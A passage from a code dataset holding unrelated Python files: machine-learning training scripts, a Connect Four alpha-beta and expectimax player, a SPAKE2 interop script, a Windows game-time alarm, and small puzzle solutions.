AttentionNetworkDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentAttentionDropOut':\r\n driving_policy = RecurrentAttentionDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n args.freeze_last_n_layers = 0\r\n\r\n if args.is_l2:\r\n # Adding weight decay with the weight decay problem fixed with AdamW\r\n opt = torch.optim.AdamW(filter(lambda p: p.requires_grad, driving_policy.parameters()), lr=args.lr, weight_decay=args.wd)\r\n else:\r\n opt = torch.optim.Adam(filter(lambda p: p.requires_grad, driving_policy.parameters()), lr=args.lr)\r\n args.start_time = time.time()\r\n\r\n args.class_dist = get_class_distribution(training_iterator, args)\r\n\r\n best_val_accuracy = 0\r\n for epoch in range(args.n_epochs):\r\n print ('EPOCH ', epoch)\r\n\r\n curr_train_loss = train_discrete(driving_policy, training_iterator, opt, args)\r\n train_loss.append(curr_train_loss)\r\n\r\n curr_val_accuracy = test_discrete(driving_policy, validation_iterator, opt, args)\r\n\r\n if (curr_val_accuracy > best_val_accuracy):\r\n best_val_accuracy = curr_val_accuracy\r\n torch.save(driving_policy.state_dict(), args.weights_out_file)\r\n test_acc.append(best_val_accuracy)\r\n else:\r\n test_acc.append(curr_val_accuracy)\r\n\r\n if args.is_l2:\r\n if args.output_log:\r\n train_log = './logs/{}_Loss_weight_decay.txt'.format(args.policy)\r\n test_log = './logs/{}_Acc_weight_decay.txt'.format(args.policy)\r\n\r\n with open(train_log, 'w') as f_train:\r\n for loss in train_loss:\r\n f_train.write(str(loss) + '\\n')\r\n with open(test_log, 'w') as f_test:\r\n for accuracy in test_acc:\r\n f_test.write(str(accuracy) + '\\n')\r\n\r\n elif args.is_dropout:\r\n if 
args.output_log:\r\n            train_log = './logs/{}_Loss_drop_out.txt'.format(args.policy)\r\n            test_log = './logs/{}_Acc_drop_out.txt'.format(args.policy)\r\n\r\n            with open(train_log, 'w') as f_train:\r\n                for loss in train_loss:\r\n                    f_train.write(str(loss) + '\\n')\r\n            with open(test_log, 'w') as f_test:\r\n                for accuracy in test_acc:\r\n                    f_test.write(str(accuracy) + '\\n')\r\n    else:\r\n        if args.output_log:\r\n            train_log = './logs/{}_Loss.txt'.format(args.policy)\r\n            test_log = './logs/{}_Acc.txt'.format(args.policy)\r\n\r\n            with open(train_log, 'w') as f_train:\r\n                for loss in train_loss:\r\n                    f_train.write(str(loss) + '\\n')\r\n            with open(test_log, 'w') as f_test:\r\n                for accuracy in test_acc:\r\n                    f_test.write(str(accuracy) + '\\n')\r\n\r\n\r\n    return driving_policy, train_loss, test_acc\r\n\r\nif __name__ == \"__main__\":\r\n    parser = parse_args()\r\n    args = parser.parse_args()\r\n\r\n    main(args)\r\n","sub_path":"train_policy.py","file_name":"train_policy.py","file_ext":"py","file_size_in_byte":10365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"52716858","text":"## template\n\nimport sys\n\ndef reverser(unit):\n    global matrix\n    \n    idx_r=unit-1\n    # print(matrix[idx_r])\n    for idx,val in enumerate(matrix[idx_r]):\n        # print(val)\n        if(val==0):\n            # print('ck')\n            matrix[idx_r][idx]=1\n        else:\n            matrix[idx_r][idx]=0\n    # print(matrix[idx_r])\n    \n    matrix=list(map(list,zip(*matrix)))\n    # print(*matrix,sep='\\n')\n    \n    idx_c=unit-1\n    for idx,val in enumerate(matrix[idx_c]):\n        if( val == 0):\n            matrix[idx_c][idx]=1\n        else:\n            matrix[idx_c][idx]=0\n    \n    # common\n    if(matrix[idx_r][idx_c]==0):\n        matrix[idx_r][idx_c]=1\n    else:\n        matrix[idx_r][idx_c]=0\n    \n    matrix=list(map(list,zip(*matrix)))\n    \n\nif __name__==\"__main__\":\n    N=int(sys.stdin.readline().strip())\n    matrix=[]\n    \n    for _ in range(10):\n        row=list(map(int, sys.stdin.readline().split()))\n        matrix.append(row)\n    \n    units=[i for i in range(1,N+1)]\n    \n    # flip row-wise, then column-wise, then flip the shared cell back once more\n    # coordinates with a robot\n    # both take the same steps, they just differ in implementation\n    \n    # in Python, work on matrices via the transpose\n    \n    # (row, column, common) units\n    \n    for unit in units:\n        reverser(unit)\n    \n    for row in matrix:\n        print(' '.join(map(str,row)))\n    ","sub_path":"Algorithm/python/algorithmjobs/review/L031_15reversematrix2.py","file_name":"L031_15reversematrix2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"150924679","text":"'''\nIf you are using a GPU, write the following in ~/.theanorc.\n[global]\ndevice=gpu\nfloatX=float32\n[blas]\nldflags=-lopenblas\n[cuda]\nroot=/opt/apps/cuda/7.0\n[nvcc]\nfastmath=True\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport time\nimport cPickle as pickle\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\n\nimport lasagne\nfrom lasagne import layers\nfrom lasagne.updates import nesterov_momentum\nfrom lasagne.objectives import squared_error\nfrom lasagne.objectives import categorical_crossentropy\nfrom lasagne.nonlinearities import leaky_rectify\nfrom lasagne.init import Orthogonal, Constant\nfrom nolearn.lasagne import NeuralNet\nfrom nolearn.lasagne import BatchIterator\nfrom lasagne.nonlinearities import softmax\n\nfrom sklearn import neighbors\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.utils import check_random_state\n\nfrom astropy.io import fits\nfrom astropy import 
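The --weighted_loss path in the train_policy.py record above passes the distribution from get_class_distribution into nn.CrossEntropyLoss. A hedged sketch of the same mechanism with made-up counts; note it uses inverse-frequency weights, a common choice for rare classes, rather than the normalized frequencies the script itself passes in:

import torch
import torch.nn as nn

counts = torch.tensor([900.0, 90.0, 10.0])        # samples seen per class
weights = counts.sum() / (len(counts) * counts)   # inverse-frequency weights
criterion = nn.CrossEntropyLoss(weight=weights)

logits = torch.randn(4, 3)                        # (batch, n_classes)
labels = torch.tensor([0, 2, 1, 0])
loss = criterion(logits, labels)                  # rare classes count for more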
wcs\n\nimport bmc\n\nX_init = np.load(\"/work/04323/thrush/data/train/X.npy\")\ny_init = np.load(\"/work/04323/thrush/data/train/y.npy\")\n\nX_small = X_init[:70000] #Added to cut down run time\ny_small = y_init[:70000] #This too\n\ndef renormalize(array): \n return (array - array.min()) /(array.max() - array.min())\n\nfor i in range(5):\n X_small[:,i,:,:] = renormalize(X_small[:,i,:,:])\n\ny_small = renormalize(y_small)\n\nprint(\"X_init type = {}, y_init type = {}\".format(type(X_small), type(y_small)))\n\nX, X_test, y, y_test = train_test_split(X_small, y_small, test_size = 0.2, random_state=24)\n\nprint(\"X.shape = {}, X.min = {}, X.max = {}\".format(X.shape, X.min(), X.max()))\n\nprint(\"y.shape = {}, y.min = {}, y.max = {}\".format(y.shape, y.min(), y.max()))\n\n#def renormalize(array):\n# return (array - array.min()) / (array.max() - array.min())\n\n#for i in range(5):\n# X[:, i, :, :] = renormalize(X[:, i, :, :])\n\nX = X.astype(np.float32)\n \ny = y.astype(np.float32)\n\nprint(\"X.shape = {}, X.min = {}, X.max = {}\".format(X.shape, X.min(), X.max()))\nprint(\"y.shape = {}, y.min = {}, y.max = {}\".format(y.shape, y.min(), y.max()))\n\ndef compute_PCA(array):\n\n nimages0, nchannels0, height0, width0 = array.shape\n rolled = np.transpose(array, (0, 2, 3, 1))\n # transpose from N x channels x height x width to N x height x width x channels\n nimages1, height1, width1, nchannels1 = rolled.shape\n # check shapes\n assert nimages0 == nimages1\n assert nchannels0 == nchannels1\n assert height0 == height1\n assert width0 == width1\n # flatten\n reshaped = rolled.reshape(nimages1 * height1 * width1, nchannels1)\n \n from sklearn.decomposition import PCA\n \n pca = PCA()\n pca.fit(reshaped)\n \n cov = pca.get_covariance()\n \n eigenvalues, eigenvectors = np.linalg.eig(cov)\n \n return eigenvalues, eigenvectors\n\n\nclass AugmentedBatchIterator(BatchIterator):\n \n def __init__(self, batch_size, crop_size=8, testing=False):\n super(AugmentedBatchIterator, self).__init__(batch_size)\n self.crop_size = crop_size\n self.testing = testing\n\n def transform(self, Xb, yb):\n\n Xb, yb = super(AugmentedBatchIterator, self).transform(Xb, yb)\n batch_size, nchannels, width, height = Xb.shape\n \n if self.testing:\n if self.crop_size % 2 == 0:\n right = left = self.crop_size // 2\n else:\n right = self.crop_size // 2\n left = self.crop_size // 2 + 1\n X_new = Xb[:, :, right: -left, right: -left]\n return X_new, yb\n\n eigenvalues, eigenvectors = compute_PCA(Xb)\n\n # Flip half of the images horizontally at random\n indices = np.random.choice(batch_size, batch_size // 2, replace=False) \n Xb[indices] = Xb[indices, :, :, ::-1]\n\n # Crop images\n X_new = np.zeros(\n (batch_size, nchannels, width - self.crop_size, height - self.crop_size),\n dtype=np.float32\n )\n\n for i in range(batch_size):\n # Choose x, y pixel posiitions at random\n px, py = np.random.choice(self.crop_size, size=2)\n \n sx = slice(px, px + width - self.crop_size)\n sy = slice(py, py + height - self.crop_size)\n \n # Rotate 0, 90, 180, or 270 degrees at random\n nrotate = np.random.choice(4)\n \n # add random color perturbation\n alpha = np.random.normal(loc=0.0, scale=0.5, size=5)\n noise = np.dot(eigenvectors, np.transpose(alpha * eigenvalues))\n \n for j in range(nchannels):\n X_new[i, j] = np.rot90(Xb[i, j, sx, sy] + noise[j], k=nrotate)\n \n return X_new, yb\n\n\nclass SaveParams(object):\n\n def __init__(self, name):\n self.name = name\n\n def __call__(self, nn, train_history):\n if train_history[-1][\"valid_loss_best\"]:\n 
nn.save_params_to(\"{}.params\".format(self.name))\n with open(\"{}.history\".format(self.name), \"wb\") as f:\n pickle.dump(train_history, f)\n\nclass UpdateLearningRate(object):\n\n def __init__(self, start=0.001, stop=0.0001):\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, nn, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, nn.max_epochs)\n\n epoch = train_history[-1]['epoch']\n new_value = np.float32(self.ls[epoch - 1])\n getattr(nn, \"update_learning_rate\").set_value(new_value)\n\nclass TrainSplit(object):\n\n def __init__(self, eval_size):\n self.eval_size = eval_size\n\n def __call__(self, X, y, net):\n if self.eval_size:\n X_train, y_train = X[:-self.eval_size], y[:-self.eval_size]\n X_valid, y_valid = X[-self.eval_size:], y[-self.eval_size:]\n else:\n X_train, y_train = X, y\n X_valid, y_valid = _sldict(X, slice(len(y), None)), y[len(y):]\n\n return X_train, X_valid, y_train, y_valid\n\nnet = NeuralNet(\n layers=[\n ('input', layers.InputLayer),\n\n ('conv11', layers.Conv2DLayer),\n ('pool1', layers.MaxPool2DLayer),\n\n ('conv21', layers.Conv2DLayer),\n ('conv22', layers.Conv2DLayer),\n ('pool2', layers.MaxPool2DLayer),\n\n ('conv31', layers.Conv2DLayer),\n ('conv32', layers.Conv2DLayer),\n ('pool3', layers.MaxPool2DLayer),\n\n ('hidden4', layers.DenseLayer),\n ('dropout4', layers.DropoutLayer),\n \n ('hidden5', layers.DenseLayer),\n ('dropout5', layers.DropoutLayer),\n\n ('output', layers.DenseLayer),\n ],\n input_shape=(None, 5, 44, 44),\n \n conv11_num_filters=32, conv11_filter_size=(5, 5), \n pool1_pool_size=(2, 2),\n\n conv21_num_filters=64, conv21_filter_size=(3, 3),\n conv22_num_filters=64, conv22_filter_size=(3, 3),\n pool2_pool_size=(2, 2),\n\n conv31_num_filters=128, conv31_filter_size=(3, 3),\n conv32_num_filters=128, conv32_filter_size=(3, 3),\n pool3_pool_size=(2, 2),\n\n hidden4_num_units=2048,\n dropout4_p=0.5,\n \n hidden5_num_units=2048,\n dropout5_p=0.5,\n\n output_num_units=1,\n output_nonlinearity=None,\n\n update_learning_rate=0.0001,\n update_momentum=0.9,\n\n objective_loss_function=squared_error,\n regression=True,\n max_epochs=1000,\n batch_iterator_train=AugmentedBatchIterator(batch_size=128, crop_size=4),\n batch_iterator_test=AugmentedBatchIterator(batch_size=128, crop_size=4, testing=True),\n \n on_epoch_finished=[SaveParams(\"net\")],\n\n verbose=2,\n )\n\n\nnet.fit(X, y)\n\ntrain_loss = [row['train_loss'] for row in net.train_history_]\nvalid_loss = [row['valid_loss'] for row in net.train_history_]\n\nnp.save(\"/work/04323/thrush/train_loss.npy\", train_loss)\nnp.save(\"/work/04323/thrush/valid_loss.npy\", valid_loss)\n \nbest_valid_loss = min([row['valid_loss'] for row in net.train_history_])\nprint(\"Best valid loss: {}\".format(best_valid_loss))\n\n#for i in range(5):\n# X_test[:, i, :, :] = (X_test[:,i,:,:] - X[:,i,:,:].min())/(X[:,i,:,:].max() - X[:,i,:,:].min())#renormalize(X_test[:, i, :, :])\n\nX_test = X_test.astype(np.float32)\n#y_test = (y_test - y.min())/(y.max() - y.min()) #renormalize(y_test).astype(np.float32)\n\ny_test = y_test.astype(np.float32)\ny_pred = net.predict(X_test)\n\nnp.save(\"/work/04323/thrush/sdss_convnet_pred.npy\", y_pred)\nnp.save(\"/work/04323/thrush/y_test.npy\",y_test)\n\nfrom sklearn.metrics import mean_squared_error\nprint(\"Mean squared error:\")\nprint(mean_squared_error(y_test, y_pred))\n\nfrom sklearn.metrics import r2_score\nprint(\"R2 score:\")\nprint(r2_score(y_test, y_pred))\n\nfrom sklearn.metrics import 
median_absolute_error\nprint(\"Median absolute error:\")\nprint(median_absolute_error(y_test, y_pred))\nprint(\"Testing set done.\")\n","sub_path":"shallowNN/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":8871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"162667762","text":"'''\nPostprocessing on deeplift importance scores\nAuthor: Anna G. Green\n\n'''\nfrom __future__ import print_function\nimport warnings\nimport glob\nimport sparse\nimport numpy as np\nimport pandas as pd\n\n# Read in phenotype data\ndf_geno_pheno = pd.read_pickle(\"../focus_cnn/multitask_geno_pheno_train_test.pkl\")\ndf_geno_pheno = df_geno_pheno.query(\"category=='set1_original_10202'\")\ndf_geno_pheno = df_geno_pheno.reset_index(drop=True)\n\nprint(len(df_geno_pheno))\n# Get list of all output files\noutput_files = glob.glob(\"output/*npz\")\n\n# For each file (each drug)\nfor file in output_files:\n\n    # sparse load\n    scores = sparse.load_npz(file)\n    drug = file.split(\"/\")[-1].split(\"_\")[0]\n\n    # get only the resistant strains\n    print(file, drug, scores.shape)\n    subset_df_geno_pheno = df_geno_pheno.loc[np.logical_or(df_geno_pheno[drug]==\"R\", df_geno_pheno[drug]==\"S\"),:].reset_index(drop=True)\n    resistant_strains = subset_df_geno_pheno.loc[df_geno_pheno[drug]==\"R\",:].index\n\n    if len(resistant_strains)==0:\n        continue\n\n    assert len(subset_df_geno_pheno) == scores.shape[0]\n\n    # take only isolates that are resistant\n    scores_subset = scores[resistant_strains, :, :].todense()\n    print(\"shape of the scores\", scores_subset.shape)\n\n    # Take max, median, and mean of saliency at each position\n    max_score = np.max(np.abs(scores_subset), axis=0)\n    median_score = np.median(scores_subset, axis=0)\n    mean_score = np.mean(scores_subset, axis=0)\n\n    # save to file\n    np.save(f\"output/{drug}_max.npy\", max_score)\n    np.save(f\"output/{drug}_median.npy\", median_score)\n    np.save(f\"output/{drug}_mean.npy\", mean_score)\n","sub_path":"sd_cnn/deeplift/02.deeplift_models_to_mean.py","file_name":"02.deeplift_models_to_mean.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"502078196","text":"#coding:utf-8\n# For Windows 8.1 and above\nimport win32com.client as wc\nimport time, os\ns = wc.Dispatch(\"SAPI.SpVoice\")\ns.Speak(\"You have 30 minutes to play Assassin's Creed 2\")\ntime.sleep(600)\ns.Speak(\"20 minutes left\")\ntime.sleep(600)\ns.Speak(\"10 minutes left\")\ntime.sleep(540)\ns.Speak(\"Your computer will shut down in 1 minute, you should quit the game.\")\nfor i in range(50):\n    s.Speak(str(50-i))\n    time.sleep(1)\ntime.sleep(9)\ns.Speak(\"Now the system is going to shut down\")\nos.system(\"shutdown /h /t 60\")","sub_path":"voice/alarm.pyw","file_name":"alarm.pyw","file_ext":"pyw","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"187384582","text":"import random\ndef rand11():\n    return random.randint(1, 11) \n\ndef solution():\n    i = rand11()\n    j = rand11()\n    while i > 10: #i is in range of 1-10\n        i = rand11()\n    while j > 6: #j is in range of 1-6\n        j = rand11()\n    \n    if i % 2 == 0: #if i is even return 1-6\n        return j\n    else: #if i is odd return 8-13\n        return j + 7\n\nprint('rand13() returns ', 
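The AugmentedBatchIterator in the train_cnn.py record above adds AlexNet-style "fancy PCA" color noise: each channel is shifted along the eigenvectors of the channel covariance. A numpy-only sketch with made-up pixel data (np.cov and eigh stand in here for the script's sklearn PCA and eig; eigh is valid since a covariance matrix is symmetric):

import numpy as np

rng = np.random.default_rng(0)
pixels = rng.random((1000, 5))                    # N pixels x 5 channels
cov = np.cov(pixels, rowvar=False)                # 5 x 5 channel covariance
eigenvalues, eigenvectors = np.linalg.eigh(cov)
alpha = rng.normal(0.0, 0.5, size=5)              # random per-component scale
noise = eigenvectors @ (alpha * eigenvalues)      # one offset per channel
noisy_pixels = pixels + noise                     # same shift for every pixel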
solution())\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"114800944","text":"import numpy as np\nfrom numpy import inf\nimport time\n\n\n# Bitstring representation of 6x7 connect 4 game\nclass Board:\n\n def __init__(self, player_number, board_matrix=None):\n self.player = 0 # this player's pieces\n self.opponent = 0 # opponent's pieces\n self.player_number = player_number\n self.opponent_number = 1 if player_number == 2 else 2\n\n if board_matrix is not None:\n player, opponent = '', ''\n for col in range(6, -1, -1):\n player += '0'\n opponent += '0'\n for row in range(0, 6):\n player += '1' if board_matrix[row, col] == self.player_number else '0'\n opponent += '1' if board_matrix[row, col] == self.opponent_number else '0'\n self.player = int(player, 2)\n self.opponent = int(opponent, 2)\n\n # Return array of non-full columns\n def valid_moves(self):\n mask = self.player | self.opponent\n moves = []\n for col in range(7):\n if (mask & (1 << ((col * 7) + 5))) == 0:\n moves.append(col)\n return moves\n\n # Return new Board with a `player_number` piece in column `col`\n def move(self, col, player_number):\n new = Board(self.player_number)\n mask = self.player | self.opponent\n mask |= mask + (1 << (col * 7))\n if player_number == self.player_number:\n new.player = self.opponent ^ mask \n new.opponent = self.opponent\n else:\n new.player = self.player\n new.opponent = self.player ^ mask\n return new\n\n # Get piece at (`row`, `col`)\n # def get(self, row, col):\n # select = 1 << ((col * 7) + 5 - row)\n # if self.player & select != 0: return self.player_number\n # if self.opponent & select != 0: return self.opponent_number\n # return 0\n\n def is_end(self):\n\n # Board is full\n if (self.player | self.opponent) == 279258638311359: # this number represents the value of a full bitboard\n return 0\n \n # Check 4 in a row\n for p, n in [ (self.player, self.player_number), (self.opponent, self.opponent_number) ]:\n # This strategy for checking 4 in a row is borrowed from:\n # https://medium.com/@gillesvandewiele/creating-the-perfect-connect-four-ai-bot-c165115557b0\n \n # Horizontal -\n m = p & (p >> 7)\n if m & (m >> 14):\n return n\n # Diagonal \\\n m = p & (p >> 6)\n if m & (m >> 12):\n return n\n # Diagonal /\n m = p & (p >> 8)\n if m & (m >> 16):\n return n\n # Vertical |\n m = p & (p >> 1)\n if m & (m >> 2):\n return n\n\n return 0\n\n\nclass AIPlayer:\n\n def __init__(self, player_number):\n self.player_number = player_number\n self.opponent_number = 1 if player_number == 2 else 2\n self.type = 'ai'\n self.player_string = 'Player {}:ai'.format(player_number)\n\n def get_alpha_beta_move(self, board):\n \"\"\"\n Given the current state of the board, return the next move based on\n the alpha-beta pruning algorithm\n\n This will play against either itself or a human player\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n MAX_DEPTH = 7\n\n # Create bitstring representation of board to improve performance\n board = Board(self.player_number, 
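The solution() in the test.py record above maps even/odd draws onto two halves, but j + 7 with j in 1-6 yields 8-13, so 7 is never produced and the output is not uniform over 1-13. A hedged sketch of a uniform alternative via rejection sampling: two rand11 draws give 121 equally likely outcomes, and keeping the first 117 = 9 * 13 of them folds evenly onto 1-13.

import random

def rand11():
    return random.randint(1, 11)

def rand13():
    while True:
        n = (rand11() - 1) * 11 + (rand11() - 1)  # uniform on 0..120
        if n < 117:                               # accept 117 = 9 * 13 outcomes
            return n % 13 + 1                     # uniform on 1..13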
board)\n\n def max_value(board, alpha, beta, depth):\n if depth >= MAX_DEPTH or board.is_end():\n return self.evaluation_function(board)\n v = -inf\n for col in board.valid_moves():\n v = max(v, min_value(board.move(col, self.player_number), alpha, beta, depth + 1))\n if v >= beta:\n return v\n alpha = max(alpha, v)\n return v\n\n def min_value(board, alpha, beta, depth):\n if depth >= MAX_DEPTH or board.is_end():\n return self.evaluation_function(board)\n v = inf\n for col in board.valid_moves():\n v = min(v, max_value(board.move(col, self.opponent_number), alpha, beta, depth + 1))\n if v <= alpha:\n return v\n beta = min(beta, v)\n return v\n\n start_time = time.time()\n\n best_score = -inf\n best_col = None\n for col in board.valid_moves():\n v = min_value(board.move(col, self.player_number), best_score, inf, 1)\n if v > best_score:\n best_score = v\n best_col = col\n\n print('Alpha-Beta Depth={} finished in {} seconds'.format(MAX_DEPTH, time.time() - start_time))\n \n return best_col\n\n def get_expectimax_move(self, board):\n \"\"\"\n Given the current state of the board, return the next move based on\n the expectimax algorithm.\n\n This will play against the random player, who chooses any valid move\n with equal probability\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n # Must generate random seed because multiprocessing always uses same seed???\n np.random.seed()\n\n MAX_DEPTH = 5\n\n # Create bitstring representation of board to improve performance\n board = Board(self.player_number, board)\n\n def value(board, depth, agent):\n if depth >= MAX_DEPTH or board.is_end(): return self.evaluation_function(board)\n if agent: return max_value(board, depth + 1)\n else: return exp_value(board, depth + 1)\n\n def max_value(board, depth):\n return max([ value(board.move(col, self.player_number), depth, False) for col in board.valid_moves() ])\n\n def exp_value(board, depth):\n return np.mean([ value(board.move(col, self.opponent_number), depth, True) for col in board.valid_moves() ])\n\n start_time = time.time()\n\n best_score = -inf\n best_col = None\n for col in board.valid_moves():\n score = value(board.move(col, self.player_number), 1, False)\n if score > best_score:\n best_score = score\n best_col = col\n\n print('Expectimax Depth={} finished in {} seconds'.format(MAX_DEPTH, time.time() - start_time))\n\n return best_col\n\n ROWS, COLS = 6, 7\n SEQUENCES = []\n for delta_x, delta_y, range_x, range_y in [\n (1, 0, range(ROWS - 3), range(ROWS)), # Horizontal (-) score\n (0, 1, range(COLS), range(ROWS - 3)), # Vertical (|) score\n (1, 1, range(COLS - 3), range(ROWS - 3)), # Diagonal (\\) score\n (-1, 1, range(3, COLS), range(ROWS - 3)), # Diagonal (/) score\n ]:\n for col in range_x:\n for row in range_y:\n x = col\n y = row\n sequence = []\n for _ in range(4):\n sequence.append(1 << ((x * 7) + 5 - y)) # Get a bitmask from the row and column\n x += delta_x\n y += delta_y\n SEQUENCES.append(sequence)\n\n def evaluation_function(self, board):\n \"\"\"\n Given the current stat of the board, return the scalar value that \n represents the evaluation function for the current 
player\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The utility value for the current board\n \"\"\"\n\n total_score = 0\n\n # Iterate over ALL possible 4-in-a-row sequences on the game-board\n for sequence in self.SEQUENCES:\n this_score = 0\n other_score = 0\n for mask in sequence:\n if board.player & mask != 0: this_score += 1\n elif board.opponent & mask != 0: other_score += 1\n\n # Only give points for this possibility if the other player has\n # no pieces obstructing it\n if other_score == 0:\n # Add this player's score\n if this_score == 2: total_score += 1\n elif this_score == 3: total_score += 3\n elif this_score == 4: total_score += 7\n elif this_score == 0:\n # Subtract opponent's score\n if other_score == 2: total_score -= 1\n elif other_score == 3: total_score -= 3\n elif other_score == 4: total_score -= 7\n\n return total_score\n\n\nclass RandomPlayer:\n def __init__(self, player_number):\n self.player_number = player_number\n self.type = 'random'\n self.player_string = 'Player {}:random'.format(player_number)\n\n def get_move(self, board):\n \"\"\"\n Given the current board state select a random column from the available\n valid moves.\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n np.random.seed()\n valid_cols = []\n for col in range(board.shape[1]):\n if 0 in board[:,col]:\n valid_cols.append(col)\n\n return np.random.choice(valid_cols)\n\n\nclass HumanPlayer:\n def __init__(self, player_number):\n self.player_number = player_number\n self.type = 'human'\n self.player_string = 'Player {}:human'.format(player_number)\n\n def get_move(self, board):\n \"\"\"\n Given the current board state returns the human input for next move\n\n INPUTS:\n board - a numpy array containing the state of the board using the\n following encoding:\n - the board maintains its same two dimensions\n - row 0 is the top of the board and so is\n the last row filled\n - spaces that are unoccupied are marked as 0\n - spaces that are occupied by player 1 have a 1 in them\n - spaces that are occupied by player 2 have a 2 in them\n\n RETURNS:\n The 0 based index of the column that represents the next move\n \"\"\"\n\n valid_cols = []\n for i, col in enumerate(board.T):\n if 0 in col:\n valid_cols.append(i)\n\n move = int(input('Enter your move: '))\n\n while move not in valid_cols:\n print('Column full, choose from:{}'.format(valid_cols))\n move = int(input('Enter your move: '))\n\n return move\n\n","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476605339","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, unicode_literals\n\nfrom sys import argv, stdout, stderr\n\nfrom spake2 import 
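Board.is_end in the Player.py record above checks wins with pure bit arithmetic: one bit per cell, seven bits per column. A small self-contained sketch of that shift trick — p & (p >> d) marks every cell that begins a pair in direction d, and repeating with 2d finds four in a row:

def has_four(p, d):
    # d = 1 vertical, 7 horizontal, 6 and 8 for the diagonals in this layout
    m = p & (p >> d)
    return (m & (m >> 2 * d)) != 0

assert has_four(0b1111, 1)                            # four stacked in one column
assert has_four(1 | 1 << 7 | 1 << 14 | 1 << 21, 7)    # four across one row
assert not has_four(0b0111, 1)                        # three is not enough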
params\n\nif argv[1] == b\"A\":\n from spake2 import SPAKE2_A as SPAKE2_SIDE\nelif argv[1] == b\"B\":\n from spake2 import SPAKE2_B as SPAKE2_SIDE\nelif argv[1] == b\"Symmetric\":\n from spake2 import SPAKE2_Symmetric as SPAKE2_SIDE\nelse:\n raise ValueError(\"Specify side A or B\")\n\npassword = argv[2]\n\nPARAMS = {\n 'I1024': params.Params1024,\n 'I2048': params.Params2048,\n 'I3072': params.Params3072,\n 'Ed25519': params.ParamsEd25519,\n}\n\nparam = params.ParamsEd25519\nif len(argv) > 3:\n try:\n param = PARAMS[argv[3]]\n except ValueError:\n raise ValueError(\n 'Choose a valid group to use (one of %r), got %s'\n % (list(PARAMS.keys()), param))\n\n\ns = SPAKE2_SIDE(password, params=param)\nmsg_out = s.start()\nprint(msg_out.encode(\"hex\"))\nstdout.flush()\nline = raw_input()\ntry:\n msg_in = line.decode(\"hex\")\nexcept TypeError as e:\n stderr.write(\"ERROR: Could not decode line (%s): %r\\n\" % (e, line))\n stderr.flush()\n raise e\nkey = s.finish(msg_in)\nprint(key.encode(\"hex\"))\nstdout.flush()\n","sub_path":"python-spake2-interop-entrypoint.py","file_name":"python-spake2-interop-entrypoint.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"399347231","text":"import pymunk as pm\nimport pygame as pg\nfrom Car import Car\nfrom RoadBuilder import RoadBuilder\nimport constants\nimport math\n\n\nclass Level:\n def __init__(self, space, screen, car):\n self._space = space\n self._screen = screen\n self._car = car\n self._rb = RoadBuilder(self._space)\n self._c = Car(self._space, screen)\n # different generic shapes include: rectangle, circle, and segment(line)\n self._shapes_to_draw = {'rect': [], 'circle': [], 'segment': []}\n\n def _create_road(self, vs):\n _road_body, segments = self._rb.build_road(vs, 5)\n return segments\n\n def _create_ball(self, _mass, _inertia, _x_pos, _y_pos, _radius, friction=0.9, elasticity=0.3):\n body = pm.Body(_mass, _inertia, pm.Body.DYNAMIC)\n body.position = (_x_pos, _y_pos)\n shape = pm.Circle(body, _radius, (0, 0))\n shape.friction = friction\n shape.elasticity = elasticity\n self._space.add(body)\n self._space.add(shape)\n return body, shape\n\n def draw(self):\n # draw all rectangle shapes\n for shape_list in self._shapes_to_draw['rect']:\n shape = shape_list[0]\n w, h = shape_list[2], shape_list[3]\n # creating a surface object\n surface = pg.Surface((w, h), pg.SRCALPHA)\n surface.fill(shape_list[1])\n rot = -math.degrees(shape.body.angle)\n # 